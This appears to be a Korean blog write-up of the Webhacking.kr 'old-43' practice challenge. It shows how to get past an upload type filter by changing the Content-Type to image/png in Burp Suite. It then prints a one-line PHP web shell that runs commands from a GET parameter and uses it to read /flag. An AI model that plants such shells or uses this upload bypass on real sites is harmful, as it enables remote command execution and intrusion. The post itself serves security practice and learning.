Webhacking.kr :: old-43번

여기서 그냥 제출을 눌러보면

 

 

type not detected 가 뜬다.

 

간단한 tmp.txt 파일을 제출하면,

Type 이 옳지 않다고 한다.

그래서 이미지를 하나 올렸더니 Done! 이라고 뜬다.

 

 

webshell 을 업로드 하라고 되어있지만, txt 기반의 파일들은 필터링하는 것 같다. (php 는 물론 안됨)

 

프록시를 써서 php 를 업로드하되, img 라고 인식하도록 만들자.

(Burp Suite 사용법 참조 - 2021/02/17 - [SECURITY/Webhacking] - Burp Suite 설치 및 사용 - Windows 64 bit)

 

업로드할 php 의 코드는 다음과 같다.

<?php
	system($_GET[cmd]);
?>

cmd 를 GET 으로 가져와서 실행시키는 코드이다.

여기서 cmd 에 cat /flag 를 하면 웹쉘에서 cat /flag 를 통해 flag 값을 보여줄 것이다.

 

제출을 누른 뒤, 제출에 대한 Request 를 프록시로 변조한다.

Content-Type 을 image/png 라고 하고, 원하는 php 코드를 넣어준다.

 

 

a.php 이지만 잘 업로드가 되었고, (Type 을 속였으니)

저 ./upload/a.php 를 눌러보면 업로드한 파일을 볼 수 있다.

 

 

그냥 눌러보면 아무것도 안뜨지만, (cmd 에 아무런 내용이 없어서)

url 에 cmd=cat /flag 라고 하면, FLAG 값이 나온다. 

 

이걸 Auth 에 넣어주면 끝!

 

 

 

 

+ 번외

 

FLAG 가 base64 로 인코딩된 거라 궁금해서 디코딩 해봤더니 다음과 같이 나왔다.

Auth 에는 그냥 base64 로 인코딩된 것 그대로 넣어주면 되지만 재밌는 장치를 해놨다는 생각이 들었다.

 

 

 

Ref.

[1] webshell code1018.tistory.com/96

.